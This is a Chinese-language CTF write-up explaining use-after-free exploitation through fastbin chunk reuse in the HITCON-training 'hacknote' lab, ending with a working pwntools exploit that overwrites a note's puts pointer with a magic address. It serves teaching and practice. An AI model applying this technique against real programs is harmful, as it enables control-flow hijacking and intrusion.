Use After Free 译为free之后的使用
内存块被释放后,其对应的指针没有被设置为NULL
这给我们修改并且执行被释放内存的机会
这里利用了堆的fastbin机制
fastbin为了快速的利用堆空间,将较小的chunk统一管理
具体是把相同大小的chunk单向链表连接,并且满足后进入链表的chunk会先被使用
这有点类似stack的后进先出
HITCON-training lab 10 hacknote
应该主要有3个功能
1.增加note
2.删除note
3.打印note内容
一般来说我们最关心的就是删除note操作,如下
我们发现 删除操作仅仅是把一哥note的head和内容给free掉 并没有将notelist指向NULL
这样的话我们就可以通过删除后的添加 使得添加的note的head和内容指针指向被释放的chunk地址
具体操作如下,可以模拟一下
(截图自https://wiki.x10sec.org/pwn/heap/use_after_free/#_4)
遇到其他类似的题目 只需要申请多个note(head)大小的东西 删除后再申请
使得某原函数(这里是puts)指针指向我们想跳转的地方即可
from pwn import * io=process('./hacknote') # io=remote('111.186.57.117',50202) def add_note(size,note): io.sendlineafter('choice :','1') io.sendlineafter('size :',str(size)) io.sendlineafter('Content :',note) def del_note(num): io.sendlineafter('choice :','2') sleep(0.5) io.sendline(str(num)) def print_note(num): io.sendlineafter('choice :','3') sleep(0.5) io.sendline(str(num)) magic_addr=0x08048986 add_note(16,'aaaa') add_note(16,'bbbb') del_note(0) del_note(1) add_note(8,p32(magic_addr)*2) print_note(0) io.interactive()